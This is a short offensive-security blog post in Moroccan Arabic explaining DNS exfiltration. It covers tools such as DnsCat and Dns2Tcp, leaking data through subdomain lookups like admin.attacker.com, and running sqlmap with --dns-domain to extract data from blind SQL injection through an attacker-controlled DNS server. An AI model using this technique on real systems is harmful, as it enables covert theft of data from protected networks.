DNS Exfiltration

اليوم عندنا موضوع زوين و كينفع بزاف فبعض الحالات ديال الهجمات المعقدة و اللي كتكون وسط شبكات داخلية Intranet او محمية بجدران نارية Firewall

كيف ما كتعرفو ان الDNS هي خدمة حيوية فسيرورة الشبكات سواء انترنت بشكل عام او الشبكات الداخلية intranet, و اللي لا يمكن بأي حال من الأحوال توقيفها او عرقلتها و ايلا غتسبب الشلل التام

و هنا بانت عبقرية بعض الخبراء بداية الألفينات اللي استغلو هاد الخدمة لأغراض أخرى من غير الغرض الأساسي اللي تصممات من اجله

هادي على الأقل عشر سنوات باش كان لي اول استعمل لاوائل البرامج من هاد النوع، الرائع DnsCat او Dns2Tcp

بهاد الطريقة يمكنلك تفتح قناة للإتصال فقط عن طريق الDns، و تدوز عند طريقها ملفات او معلومات مقسمة لأجزاء و تعاود تجمعها فالطرف الأخر بعد استقبالها، رسمت هاد الشرح البسيط من باش تفهمو مزيان

كيف ما مبين فالرسم، نتا كمهاجم خاص يكون عندك سيرفر ديالك و مسجل عنوان ويب، تحويل المعلومات كيكون عن طريق الsubdomains, مثلا اذا كنتي غادي تحول كلمة admin من سيرفر الضحية لعندك ، من الجهة الأخرى كتدوز كوموند ديال Dns resolve فيها admin.attacker.com و نتا كتشوف ان الضحية كيسول السيرفر ديالك على داك subdomain, بينما فالحقيقة المعلومة اللي نتا باغي هي داك subdomain نفسه! 😃

طبعا ممكن اي حاجة تدوز بلاصة داك الاسم، ملفات على قدها ممكن تتحول مقسومة الى اجزاء بتشفير base64 و البرامج اللي كاينة كتتكلف بالمهمة

دابا ندوزو لمثال حي فين هاد “التويشية” مهمة و غتنفعك بزاف: في حالة الSQL INJECTIONS و خصوصا اذا كانت Blind, Time Base or Stacked Queries و داك العدد الهائل ديال requests اللي كيحتاجوه ممكن تختزلوه فالdns exfiltration

غنستعملو اشهر برنامج الغني عن التعريف sqlmap و الخاصية ديال –dns-domain

اول خاص سيرفر فين غتستعمل sqlmap لحقاش وسطو منو كاين سيرفر dns مصغّر كيقوم بالعملية كاملة، و خاص خدمة ديال dns كننصح باستعمال https://freedns.afraid.org

خاصك تقاد الconfiguration فحال هاكدا

تستنا واحد الشوية على ما توقع propagation باش يكون السيرفر واجد ناضي

بعدها تلونصي sqlmap و معاه –dns-domain=yourserver.com

و هادشي كامل نصيحة من وزارة الصحة باش تستهلك بلا ما تتهلك 😎